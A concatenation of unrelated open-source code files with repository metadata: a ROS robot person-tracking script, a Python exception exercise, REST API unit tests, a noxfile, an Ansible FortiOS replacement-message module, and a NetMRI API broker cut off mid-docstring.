0.663973
ccd22d7f32a2c08ed895a76d5482386df233260a
5,693
py
Python
person_tracking/scripts/real_time_object_detection.py
CARMinesDouai/2020-RobotGuide-Freight
123f4ba42f09b36038b519c69fc42208478408f2
[ "MIT" ]
null
null
null
person_tracking/scripts/real_time_object_detection.py
CARMinesDouai/2020-RobotGuide-Freight
123f4ba42f09b36038b519c69fc42208478408f2
[ "MIT" ]
null
null
null
person_tracking/scripts/real_time_object_detection.py
CARMinesDouai/2020-RobotGuide-Freight
123f4ba42f09b36038b519c69fc42208478408f2
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # USAGE # python real_time_object_detection.py --prototxt MobileNetSSD_deploy.prototxt.txt --model MobileNetSSD_deploy.caffemodel # import the necessary packages from imutils.video import VideoStream from imutils.video import FPS from geometry_msgs.msg import Twist from sensor_msgs.msg import LaserScan import numpy as np import argparse import imutils import time import cv2 import rospy startX=0 startY=0 endX=0 endY=0 start_robot=0 max_size_X=0 max_size_Y=0 mean_dist_right=0 mean_dist_left=0 last_startX=0 last_endX=0 obstacle_detected=1 person_lost=0 idx=0 vel_msg=Twist() # construct the argument parse and parse the arguments ap = argparse.ArgumentParser() ap.add_argument("-p", "--prototxt", required=True, help="path to Caffe 'deploy' prototxt file") ap.add_argument("-m", "--model", required=True, help="path to Caffe pre-trained model") ap.add_argument("-c", "--confidence", type=float, default=0.2, help="minimum probability to filter weak detections") args = vars(ap.parse_args()) # initialize the list of class labels MobileNet SSD was trained to # detect, then generate a set of bounding box colors for each class CLASSES = ["background", "aeroplane", "bicycle", "bird", "boat", "bottle", "bus", "car", "cat", "chair", "cow", "diningtable", "dog", "horse", "motorbike", "person", "pottedplant", "sheep", "sofa", "train", "tvmonitor"] COLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3)) # load our serialized model from disk print("[INFO] loading model...") net = cv2.dnn.readNetFromCaffe(args["prototxt"], args["model"]) # initialize the video stream, allow the cammera sensor to warmup, # and initialize the FPS counter print("[INFO] starting video stream...") vs = VideoStream(src=3).start() time.sleep(2.0) fps = FPS().start() def move_robot(obstacle_detected,person_lost): global vel_msg global startX global startY global endX global endY global last_endX global last_startX global vel_msg if person_lost==0: vel_msg.angular.z=-obstacle_detected*(((startX+endX)/400)-1)*1.2 vel_msg.linear.x=((startY/8)-1)/30 elif person_lost==1: vel_msg.angular.z=0.3 vel_msg.linear.x=0.1 else: vel_msg.angular.z=-0.3 vel_msg.linear.x=0.1 if vel_msg.linear.x>0.4: vel_msg.linear.x=0.4 _cmd_pub.publish(vel_msg) if startX!=0 and endX!=0: last_endX=endX last_startX=startX return last_endX,last_startX def laser_detection(data): Lengths = len(data.ranges) total_range_left=0.0 total_range_right=0.0 mean_dist_right=0.0 mean_dist_left=0.0 global obstacle_detected global vel_msg for i in range(0,242): if data.ranges[i]<0.5: total_range_right+=data.ranges[i] for i in range(484,726): if data.ranges[i]<0.5: total_range_left+=data.ranges[i] mean_dist_left=total_range_left/242 mean_dist_right=total_range_right/242 if (mean_dist_right>0.01 and mean_dist_right<0.16) or (mean_dist_left>0.01 and mean_dist_left<0.16) and vel_msg.angular.z>0.1 : obstacle_detected=0 else: obstacle_detected=1 return obstacle_detected def person_recognition(): global startX global startY global endX global endY global idx global person_lost global start_robot # grab the frame from the threaded video stream and resize it # to have a maximum width of 400 pixels frame = vs.read() frame = imutils.resize(frame, width=400) # grab the frame dimensions and convert it to a blob (h, w) = frame.shape[:2] blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 0.007843, (300, 300), 127.5) # pass the blob through the network and obtain the detections and # predictions net.setInput(blob) detections = net.forward() if last_endX<200 and last_startX<50 and idx==0 and start_robot==1: person_lost=1 move_robot(obstacle_detected,person_lost) elif last_endX>350 and last_startX>200 and idx==0 and start_robot==1: person_lost=2 move_robot(obstacle_detected,person_lost) else: print("depart") # loop over the detections for i in np.arange(0, detections.shape[2]): # extract the confidence (i.e., probability) associated with # the prediction confidence = detections[0, 0, i, 2] # filter out weak detections by ensuring the `confidence` is # greater than the minimum confidence if confidence > args["confidence"]: # extract the index of the class label from the # `detections`, then compute the (x, y)-coordinates of # the bounding box for the object idx = int(detections[0, 0, i, 1]) #idx15 is the index of the person if idx==15: start_robot=1 person_lost=0 move_robot(obstacle_detected,person_lost) box = detections[0, 0, i, 3:7] * np.array([w, h, w, h]) (startX, startY, endX, endY) = box.astype("int") # draw the prediction on the frame label = "{}: {:.2f}%".format(CLASSES[idx], confidence * 100) cv2.rectangle(frame, (startX, startY), (endX, endY), COLORS[idx], 2) y = startY - 15 if startY - 15 > 15 else startY + 15 cv2.putText(frame, label, (startX, y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2) else: idx=0 # show the output frame cv2.imshow("Frame", frame) # update the FPS counter fps.update() if __name__ == '__main__': rospy.init_node('person_tracking', anonymous=True) _cmd_pub = rospy.Publisher('/cmd_vel_mux/input/navi', Twist, queue_size=1) rospy.Subscriber('/scan', LaserScan, laser_detection) while True: person_recognition() print("startx="+str(startX)) print("endx="+str(endX)) print("person_lost="+str(person_lost)) print("idx="+str(idx)) print("vitesse="+str(vel_msg.linear.x)) print("angulaire="+str(vel_msg.angular.z)) key = cv2.waitKey(1) & 0xFF if key == ord("q"): fps.stop() cv2.destroyAllWindows() vs.stop()
29.045918
128
0.724925
323632b51b01039d6884d39eef1288ccbe680a73
916
py
Python
_draft/x_6_9_c.py
ofl/kuku2
7247fb1862d917d23258ebe7a93dca5939433225
[ "MIT" ]
null
null
null
_draft/x_6_9_c.py
ofl/kuku2
7247fb1862d917d23258ebe7a93dca5939433225
[ "MIT" ]
1
2021-11-13T08:03:04.000Z
2021-11-13T08:03:04.000Z
_draft/x_6_9_c.py
ofl/kuku2
7247fb1862d917d23258ebe7a93dca5939433225
[ "MIT" ]
null
null
null
# x_6_9 # # class CardErorr(Exception): pass class StoreErorr(Exception): pass class StockError(StoreErorr): pass class ZipcodeError(StoreErorr): pass class ExpiredError(CardErorr): pass class NumberError(CardErorr): pass order_count = input('きび団子を何個注文しますか?:') zipcode = input('郵便番号を入力してください:') card_number = input('カード番号を入力してください?(例、0000-0000-0000-0000):') expired_at = input('有効期限を入力してください(例、2022-03):') try: if int(order_count) > 100: raise StockError if card_number != '1111-1111-1111-1111': raise NumberError if expired_at != '2025-03': raise ExpiredError print('ご購入ありがとうございます') except StoreErorr: print('在庫切れです') except CardErorr as e: print('決済でエラーが発生しました') if isinstance(e, ExpiredError): print('有効期限が違います') elif isinstance(e, NumberError): print('カード番号が違います') finally: print('またのご利用お待ちしています')
17.615385
62
0.675764
f6c1886cb58f26bd7f951bc947a23fce51e311ba
10,282
py
Python
exercises/rest-api/rest_api_test.py
Grociu/fork-of-exercism-python
8aed8612117d5f9fa9db56a2b4bdc6143f6e15fd
[ "MIT" ]
41
2015-02-09T18:08:45.000Z
2022-03-06T15:23:32.000Z
exercises/rest-api/rest_api_test.py
Grociu/fork-of-exercism-python
8aed8612117d5f9fa9db56a2b4bdc6143f6e15fd
[ "MIT" ]
21
2019-12-28T17:47:06.000Z
2021-02-27T19:43:00.000Z
exercises/rest-api/rest_api_test.py
Grociu/fork-of-exercism-python
8aed8612117d5f9fa9db56a2b4bdc6143f6e15fd
[ "MIT" ]
18
2016-04-29T14:35:12.000Z
2021-06-23T07:32:29.000Z
import unittest import json from rest_api import RestAPI # Tests adapted from `problem-specifications//canonical-data.json` @ v1.1.1 class RestAPITest(unittest.TestCase): def test_no_users(self): database = {"users": []} api = RestAPI(database) response = api.get('/users') self.assertDictEqual(json.loads(response), database) def test_add_user(self): database = {"users": []} api = RestAPI(database) payload = json.dumps({ 'user': 'Adam' }) response = api.post('/add', payload) expected = { 'name': 'Adam', 'owes': {}, 'owed_by': {}, 'balance': 0 } self.assertDictEqual(json.loads(response), expected) def test_get_single_user(self): database = { 'users': [ { 'name': 'Adam', 'owes': {}, 'owed_by': {}, 'balance': 0 }, { 'name': 'Bob', 'owes': {}, 'owed_by': {}, 'balance': 0 } ] } api = RestAPI(database) payload = json.dumps({ 'users': ['Bob'] }) response = api.get('/users', payload) expected = { 'users': [ { 'name': 'Bob', 'owes': {}, 'owed_by': {}, 'balance': 0 } ] } self.assertDictEqual(json.loads(response), expected) def test_iou_both_users_have_0_balance(self): database = { 'users': [ { 'name': 'Adam', 'owes': {}, 'owed_by': {}, 'balance': 0 }, { 'name': 'Bob', 'owes': {}, 'owed_by': {}, 'balance': 0 } ] } api = RestAPI(database) payload = json.dumps({ 'lender': 'Adam', 'borrower': 'Bob', 'amount': 3 }) response = api.post('/iou', payload) expected = { 'users': [ { 'name': 'Adam', 'owes': {}, 'owed_by': { 'Bob': 3 }, 'balance': 3 }, { 'name': 'Bob', 'owes': { 'Adam': 3 }, 'owed_by': {}, 'balance': -3 } ] } self.assertDictEqual(json.loads(response), expected) def test_borrower_has_negative_balance(self): database = { 'users': [ { 'name': 'Adam', 'owes': {}, 'owed_by': {}, 'balance': 0 }, { 'name': 'Bob', 'owes': { 'Chuck': 3 }, 'owed_by': {}, 'balance': -3 }, { 'name': 'Chuck', 'owes': {}, 'owed_by': { 'Bob': 3 }, 'balance': 3 } ] } api = RestAPI(database) payload = json.dumps({ 'lender': 'Adam', 'borrower': 'Bob', 'amount': 3 }) response = api.post('/iou', payload) expected = { 'users': [ { 'name': 'Adam', 'owes': {}, 'owed_by': { 'Bob': 3 }, 'balance': 3 }, { 'name': 'Bob', 'owes': { 'Adam': 3, 'Chuck': 3 }, 'owed_by': {}, 'balance': -6 } ] } self.assertDictEqual(json.loads(response), expected) def test_lender_has_negative_balance(self): database = { 'users': [ { 'name': 'Adam', 'owes': {}, 'owed_by': {}, 'balance': 0 }, { 'name': 'Bob', 'owes': { 'Chuck': 3 }, 'owed_by': {}, 'balance': -3 }, { 'name': 'Chuck', 'owes': {}, 'owed_by': { 'Bob': 3 }, 'balance': 3 } ] } api = RestAPI(database) payload = json.dumps({ 'lender': 'Bob', 'borrower': 'Adam', 'amount': 3 }) response = api.post('/iou', payload) expected = { 'users': [ { 'name': 'Adam', 'owes': { 'Bob': 3 }, 'owed_by': {}, 'balance': -3 }, { 'name': 'Bob', 'owes': { 'Chuck': 3 }, 'owed_by': { 'Adam': 3 }, 'balance': 0 } ] } self.assertDictEqual(json.loads(response), expected) def test_lender_owes_borrower(self): database = { "users": [ { "name": "Adam", "owes": { "Bob": 3.0 }, "owed_by": {}, "balance": -3.0 }, { "name": "Bob", "owes": {}, "owed_by": { "Adam": 3.0 }, "balance": 3.0 } ] } api = RestAPI(database) payload = json.dumps({ 'lender': 'Adam', 'borrower': 'Bob', 'amount': 2 }) response = api.post('/iou', payload) expected = { 'users': [ { "name": "Adam", "owes": { "Bob": 1.0 }, "owed_by": {}, "balance": -1.0 }, { "name": "Bob", "owes": {}, "owed_by": { "Adam": 1.0 }, "balance": 1.0 } ] } self.assertDictEqual(json.loads(response), expected) def test_lender_owes_borrower_less_than_new_loan(self): database = { "users": [ { "name": "Adam", "owes": { "Bob": 3.0 }, "owed_by": {}, "balance": -3.0 }, { "name": "Bob", "owes": {}, "owed_by": { "Adam": 3.0 }, "balance": 3.0 } ] } api = RestAPI(database) payload = json.dumps({ 'lender': 'Adam', 'borrower': 'Bob', 'amount': 4.0 }) response = api.post('/iou', payload) expected = { 'users': [ { "name": "Adam", "owes": { }, "owed_by": { "Bob": 1.0 }, "balance": 1.0 }, { "name": "Bob", "owes": { "Adam": 1.0 }, "owed_by": { }, "balance": -1.0 } ] } self.assertDictEqual(json.loads(response), expected) def test_lender_owes_borrower_same_as_new_loan(self): database = { "users": [ { "name": "Adam", "owes": { "Bob": 3.0 }, "owed_by": {}, "balance": -3.0 }, { "name": "Bob", "owes": {}, "owed_by": { "Adam": 3.0 }, "balance": 3.0 } ] } api = RestAPI(database) payload = json.dumps({ 'lender': 'Adam', 'borrower': 'Bob', 'amount': 3.0 }) response = api.post('/iou', payload) expected = { 'users': [ { "name": "Adam", "owes": { }, "owed_by": { }, "balance": 0.0 }, { "name": "Bob", "owes": { }, "owed_by": { }, "balance": 0.0 } ] } self.assertDictEqual(json.loads(response), expected) if __name__ == '__main__': unittest.main()
26.986877
75
0.264637
67bfa4eeb220f01ba271e8a17610d6b2b82caa27
8,036
py
Python
noxfile.py
cojenco/python-storage
79b669bbede1cd4f06f1d697b71c7f9f2442fb80
[ "Apache-2.0" ]
null
null
null
noxfile.py
cojenco/python-storage
79b669bbede1cd4f06f1d697b71c7f9f2442fb80
[ "Apache-2.0" ]
null
null
null
noxfile.py
cojenco/python-storage
79b669bbede1cd4f06f1d697b71c7f9f2442fb80
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # # Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Generated by synthtool. DO NOT EDIT! from __future__ import absolute_import import os import pathlib import shutil import nox BLACK_VERSION = "black==19.10b0" BLACK_PATHS = ["docs", "google", "tests", "noxfile.py", "setup.py"] DEFAULT_PYTHON_VERSION = "3.8" SYSTEM_TEST_PYTHON_VERSIONS = ["2.7", "3.8"] UNIT_TEST_PYTHON_VERSIONS = ["2.7", "3.6", "3.7", "3.8", "3.9", "3.10"] CONFORMANCE_TEST_PYTHON_VERSIONS = ["3.8"] _DEFAULT_STORAGE_HOST = "https://storage.googleapis.com" CURRENT_DIRECTORY = pathlib.Path(__file__).parent.absolute() @nox.session(python=DEFAULT_PYTHON_VERSION) def lint(session): """Run linters. Returns a failure if the linters find linting errors or sufficiently serious code quality issues. """ session.install("flake8", BLACK_VERSION) session.run( "black", "--check", *BLACK_PATHS, ) session.run("flake8", "google", "tests") @nox.session(python=DEFAULT_PYTHON_VERSION) def blacken(session): """Run black. Format code to uniform standard. """ session.install(BLACK_VERSION) session.run( "black", *BLACK_PATHS, ) @nox.session(python=DEFAULT_PYTHON_VERSION) def lint_setup_py(session): """Verify that setup.py is valid (including RST check).""" session.install("docutils", "pygments") session.run("python", "setup.py", "check", "--restructuredtext", "--strict") def default(session): constraints_path = str( CURRENT_DIRECTORY / "testing" / f"constraints-{session.python}.txt" ) # Install all test dependencies, then install this package in-place. session.install("mock", "pytest", "pytest-cov", "-c", constraints_path) session.install("-e", ".", "-c", constraints_path) # Run py.test against the unit tests. session.run( "py.test", "--quiet", "--cov=google.cloud.storage", "--cov=google.cloud", "--cov=tests.unit", "--cov-append", "--cov-config=.coveragerc", "--cov-report=", "--cov-fail-under=0", os.path.join("tests", "unit"), *session.posargs, ) @nox.session(python=UNIT_TEST_PYTHON_VERSIONS) def unit(session): """Run the unit test suite.""" default(session) @nox.session(python=SYSTEM_TEST_PYTHON_VERSIONS) def system(session): constraints_path = str( CURRENT_DIRECTORY / "testing" / f"constraints-{session.python}.txt" ) """Run the system test suite.""" system_test_path = os.path.join("tests", "system.py") system_test_folder_path = os.path.join("tests", "system") # Check the value of `RUN_SYSTEM_TESTS` env var. It defaults to true. if os.environ.get("RUN_SYSTEM_TESTS", "true") == "false": session.skip("RUN_SYSTEM_TESTS is set to false, skipping") # Environment check: Only run tests if the environment variable is set. if not os.environ.get("GOOGLE_APPLICATION_CREDENTIALS", ""): session.skip("Credentials must be set via environment variable") # mTLS tests requires pyopenssl. if os.environ.get("GOOGLE_API_USE_CLIENT_CERTIFICATE", "") == "true": session.install("pyopenssl") system_test_exists = os.path.exists(system_test_path) system_test_folder_exists = os.path.exists(system_test_folder_path) # Environment check: only run tests if found. if not system_test_exists and not system_test_folder_exists: session.skip("System tests were not found") # Use pre-release gRPC for system tests. session.install("--pre", "grpcio") # Install all test dependencies, then install this package into the # virtualenv's dist-packages. # 2021-05-06: defer installing 'google-cloud-*' to after this package, # in order to work around Python 2.7 googolapis-common-protos # issue. session.install("mock", "pytest", "-c", constraints_path) session.install("-e", ".", "-c", constraints_path) session.install( "google-cloud-testutils", "google-cloud-iam", "google-cloud-pubsub < 2.0.0", "google-cloud-kms < 2.0dev", "-c", constraints_path, ) # Run py.test against the system tests. if system_test_exists: session.run("py.test", "--quiet", system_test_path, *session.posargs) if system_test_folder_exists: session.run("py.test", "--quiet", system_test_folder_path, *session.posargs) @nox.session(python=CONFORMANCE_TEST_PYTHON_VERSIONS) def conftest_retry(session): """Run the retry conformance test suite.""" conformance_test_path = os.path.join("tests", "conformance.py") conformance_test_folder_path = os.path.join("tests", "conformance") conformance_test_exists = os.path.exists(conformance_test_path) conformance_test_folder_exists = os.path.exists(conformance_test_folder_path) # Environment check: only run tests if found. if not conformance_test_exists and not conformance_test_folder_exists: session.skip("Conformance tests were not found") session.install("pytest",) session.install("-e", ".") # Run py.test against the conformance tests. if conformance_test_exists: session.run("py.test", "--quiet", conformance_test_path, *session.posargs) if conformance_test_folder_exists: session.run( "py.test", "--quiet", conformance_test_folder_path, *session.posargs ) @nox.session(python=DEFAULT_PYTHON_VERSION) def cover(session): """Run the final coverage report. This outputs the coverage report aggregating coverage from the unit test runs (not system test runs), and then erases coverage data. """ session.install("coverage", "pytest-cov") session.run("coverage", "report", "--show-missing", "--fail-under=100") session.run("coverage", "erase") @nox.session(python=DEFAULT_PYTHON_VERSION) def docs(session): """Build the docs for this library.""" session.install("-e", ".") session.install("sphinx==4.0.1", "alabaster", "recommonmark") shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True) session.run( "sphinx-build", "-W", # warnings as errors "-T", # show full traceback on exception "-N", # no colors "-b", "html", "-d", os.path.join("docs", "_build", "doctrees", ""), os.path.join("docs", ""), os.path.join("docs", "_build", "html", ""), ) @nox.session(python=DEFAULT_PYTHON_VERSION) def docfx(session): """Build the docfx yaml files for this library.""" session.install("-e", ".") session.install("grpcio") session.install( "sphinx==4.0.1", "alabaster", "recommonmark", "gcp-sphinx-docfx-yaml" ) shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True) session.run( "sphinx-build", "-T", # show full traceback on exception "-N", # no colors "-D", ( "extensions=sphinx.ext.autodoc," "sphinx.ext.autosummary," "docfx_yaml.extension," "sphinx.ext.intersphinx," "sphinx.ext.coverage," "sphinx.ext.napoleon," "sphinx.ext.todo," "sphinx.ext.viewcode," "recommonmark" ), "-b", "html", "-d", os.path.join("docs", "_build", "doctrees", ""), os.path.join("docs", ""), os.path.join("docs", "_build", "html", ""), )
32.666667
84
0.649701
d503dd6dc640f3e0a5c6e46789b1889d3cd56e2f
10,031
py
Python
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_replacemsg_ec.py
gvashchenkolineate/gvashchenkolineate_infra_trytravis
0fb18850afe0d8609693ba4b23f29c7cda17d97f
[ "MIT" ]
17
2017-06-07T23:15:01.000Z
2021-08-30T14:32:36.000Z
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_replacemsg_ec.py
gvashchenkolineate/gvashchenkolineate_infra_trytravis
0fb18850afe0d8609693ba4b23f29c7cda17d97f
[ "MIT" ]
32
2018-10-09T04:13:42.000Z
2020-05-11T07:20:28.000Z
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_replacemsg_ec.py
gvashchenkolineate/gvashchenkolineate_infra_trytravis
0fb18850afe0d8609693ba4b23f29c7cda17d97f
[ "MIT" ]
11
2018-10-09T00:14:53.000Z
2021-11-03T10:54:09.000Z
#!/usr/bin/python from __future__ import (absolute_import, division, print_function) # Copyright 2019 Fortinet, Inc. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. __metaclass__ = type ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'metadata_version': '1.1'} DOCUMENTATION = ''' --- module: fortios_system_replacemsg_ec short_description: Replacement messages in Fortinet's FortiOS and FortiGate. description: - This module is able to configure a FortiGate or FortiOS (FOS) device by allowing the user to set and modify system_replacemsg feature and ec category. Examples include all parameters and values need to be adjusted to datasources before usage. Tested with FOS v6.0.5 version_added: "2.9" author: - Miguel Angel Munoz (@mamunozgonzalez) - Nicolas Thomas (@thomnico) notes: - Requires fortiosapi library developed by Fortinet - Run as a local_action in your playbook requirements: - fortiosapi>=0.9.8 options: host: description: - FortiOS or FortiGate IP address. type: str required: false username: description: - FortiOS or FortiGate username. type: str required: false password: description: - FortiOS or FortiGate password. type: str default: "" vdom: description: - Virtual domain, among those defined previously. A vdom is a virtual instance of the FortiGate that can be configured and used as a different unit. type: str default: root https: description: - Indicates if the requests towards FortiGate must use HTTPS protocol. type: bool default: true ssl_verify: description: - Ensures FortiGate certificate must be verified by a proper CA. type: bool default: true state: description: - Indicates whether to create or remove the object. type: str required: true choices: - present - absent system_replacemsg_ec: description: - Replacement messages. default: null type: dict suboptions: buffer: description: - Message string. type: str format: description: - Format flag. type: str choices: - none - text - html - wml header: description: - Header flag. type: str choices: - none - http - 8bit msg_type: description: - Message type. type: str ''' EXAMPLES = ''' - hosts: localhost vars: host: "192.168.122.40" username: "admin" password: "" vdom: "root" ssl_verify: "False" tasks: - name: Replacement messages. fortios_system_replacemsg_ec: host: "{{ host }}" username: "{{ username }}" password: "{{ password }}" vdom: "{{ vdom }}" https: "False" state: "present" system_replacemsg_ec: buffer: "<your_own_value>" format: "none" header: "none" msg_type: "<your_own_value>" ''' RETURN = ''' build: description: Build number of the fortigate image returned: always type: str sample: '1547' http_method: description: Last method used to provision the content into FortiGate returned: always type: str sample: 'PUT' http_status: description: Last result given by FortiGate on last operation applied returned: always type: str sample: "200" mkey: description: Master key (id) used in the last call to FortiGate returned: success type: str sample: "id" name: description: Name of the table used to fulfill the request returned: always type: str sample: "urlfilter" path: description: Path of the table used to fulfill the request returned: always type: str sample: "webfilter" revision: description: Internal revision number returned: always type: str sample: "17.0.2.10658" serial: description: Serial number of the unit returned: always type: str sample: "FGVMEVYYQT3AB5352" status: description: Indication of the operation's result returned: always type: str sample: "success" vdom: description: Virtual domain used returned: always type: str sample: "root" version: description: Version of the FortiGate returned: always type: str sample: "v5.6.3" ''' from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.connection import Connection from ansible.module_utils.network.fortios.fortios import FortiOSHandler from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG def login(data, fos): host = data['host'] username = data['username'] password = data['password'] ssl_verify = data['ssl_verify'] fos.debug('on') if 'https' in data and not data['https']: fos.https('off') else: fos.https('on') fos.login(host, username, password, verify=ssl_verify) def filter_system_replacemsg_ec_data(json): option_list = ['buffer', 'format', 'header', 'msg_type'] dictionary = {} for attribute in option_list: if attribute in json and json[attribute] is not None: dictionary[attribute] = json[attribute] return dictionary def underscore_to_hyphen(data): if isinstance(data, list): for elem in data: elem = underscore_to_hyphen(elem) elif isinstance(data, dict): new_data = {} for k, v in data.items(): new_data[k.replace('_', '-')] = underscore_to_hyphen(v) data = new_data return data def system_replacemsg_ec(data, fos): vdom = data['vdom'] state = data['state'] system_replacemsg_ec_data = data['system_replacemsg_ec'] filtered_data = underscore_to_hyphen(filter_system_replacemsg_ec_data(system_replacemsg_ec_data)) if state == "present": return fos.set('system.replacemsg', 'ec', data=filtered_data, vdom=vdom) elif state == "absent": return fos.delete('system.replacemsg', 'ec', mkey=filtered_data['msg-type'], vdom=vdom) def is_successful_status(status): return status['status'] == "success" or \ status['http_method'] == "DELETE" and status['http_status'] == 404 def fortios_system_replacemsg(data, fos): if data['system_replacemsg_ec']: resp = system_replacemsg_ec(data, fos) return not is_successful_status(resp), \ resp['status'] == "success", \ resp def main(): fields = { "host": {"required": False, "type": "str"}, "username": {"required": False, "type": "str"}, "password": {"required": False, "type": "str", "default": "", "no_log": True}, "vdom": {"required": False, "type": "str", "default": "root"}, "https": {"required": False, "type": "bool", "default": True}, "ssl_verify": {"required": False, "type": "bool", "default": True}, "state": {"required": True, "type": "str", "choices": ["present", "absent"]}, "system_replacemsg_ec": { "required": False, "type": "dict", "default": None, "options": { "buffer": {"required": False, "type": "str"}, "format": {"required": False, "type": "str", "choices": ["none", "text", "html", "wml"]}, "header": {"required": False, "type": "str", "choices": ["none", "http", "8bit"]}, "msg_type": {"required": False, "type": "str"} } } } module = AnsibleModule(argument_spec=fields, supports_check_mode=False) # legacy_mode refers to using fortiosapi instead of HTTPAPI legacy_mode = 'host' in module.params and module.params['host'] is not None and \ 'username' in module.params and module.params['username'] is not None and \ 'password' in module.params and module.params['password'] is not None if not legacy_mode: if module._socket_path: connection = Connection(module._socket_path) fos = FortiOSHandler(connection) is_error, has_changed, result = fortios_system_replacemsg(module.params, fos) else: module.fail_json(**FAIL_SOCKET_MSG) else: try: from fortiosapi import FortiOSAPI except ImportError: module.fail_json(msg="fortiosapi module is required") fos = FortiOSAPI() login(module.params, fos) is_error, has_changed, result = fortios_system_replacemsg(module.params, fos) fos.logout() if not is_error: module.exit_json(changed=has_changed, meta=result) else: module.fail_json(msg="Error in repo", meta=result) if __name__ == '__main__': main()
29.502941
101
0.596152
2cc24ce40dd0be5944ef45c17b02b7192f49653a
59,189
py
Python
infoblox_netmri/api/broker/v3_6_0/auth_service_broker.py
IngmarVG-IB/infoblox-netmri
b0c725fd64aee1890d83917d911b89236207e564
[ "Apache-2.0" ]
null
null
null
infoblox_netmri/api/broker/v3_6_0/auth_service_broker.py
IngmarVG-IB/infoblox-netmri
b0c725fd64aee1890d83917d911b89236207e564
[ "Apache-2.0" ]
null
null
null
infoblox_netmri/api/broker/v3_6_0/auth_service_broker.py
IngmarVG-IB/infoblox-netmri
b0c725fd64aee1890d83917d911b89236207e564
[ "Apache-2.0" ]
null
null
null
from ..broker import Broker class AuthServiceBroker(Broker): controller = "auth_services" def show(self, **kwargs): """Shows the details for the specified auth service. **Inputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` True | ``default:`` None :param id: The id of the authentication service. :type id: Integer **Outputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return auth_service: The auth service identified by the specified id. :rtype auth_service: AuthService """ return self.api_request(self._get_method_fullname("show"), kwargs) def index(self, **kwargs): """Lists the available auth services. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient. **Inputs** | ``api version min:`` 3 | ``api version max:`` None | ``required:`` False | ``default:`` None :param id: The id of the authentication service. :type id: Array of Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` 0 :param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information. :type start: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` 1000 :param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000. :type limit: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` id :param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at. :type sort: Array of String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` asc :param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'. :type dir: Array of String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param select: The list of attributes to return for each AuthService. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at. If empty or omitted, all attributes will be returned. :type select: Array | ``api version min:`` 2.8 | ``api version max:`` None | ``required:`` False | ``default:`` None :param goto_field: The field name for NIOS GOTO that is used for locating a row position of records. :type goto_field: String | ``api version min:`` 2.8 | ``api version max:`` None | ``required:`` False | ``default:`` None :param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records. :type goto_value: String **Outputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return auth_services: An array of the AuthService objects that match the specified input criteria. :rtype auth_services: Array of AuthService """ return self.api_list_request(self._get_method_fullname("index"), kwargs) def search(self, **kwargs): """Lists the available auth services matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below. **Inputs** | ``api version min:`` 3 | ``api version max:`` None | ``required:`` False | ``default:`` None :param auth_method: The Authentication method of the service. One of (local, radius, tacacs, ldap, activedirectory). :type auth_method: Array of String | ``api version min:`` 3 | ``api version max:`` None | ``required:`` False | ``default:`` None :param context_params_json: Additional specific authentication method parameters are stored in this field using a json format. (such as 'base_dn' for LDAP method, Vendor Specific Attribute ID for Radius,...). :type context_params_json: Array of String | ``api version min:`` 3 | ``api version max:`` None | ``required:`` False | ``default:`` None :param created_at: The date and time the record was initially created in NetMRI. :type created_at: Array of DateTime | ``api version min:`` 3 | ``api version max:`` None | ``required:`` False | ``default:`` None :param description: Description/comment about this authentication service :type description: Array of String | ``api version min:`` 3 | ``api version max:`` None | ``required:`` False | ``default:`` None :param enabled_authz_ind: A flag indicating whether this service is used for computing privileges for the remote users. :type enabled_authz_ind: Array of Boolean | ``api version min:`` 3 | ``api version max:`` None | ``required:`` False | ``default:`` None :param enabled_ind: A flag indicating whether the authentication service settings is enabled or 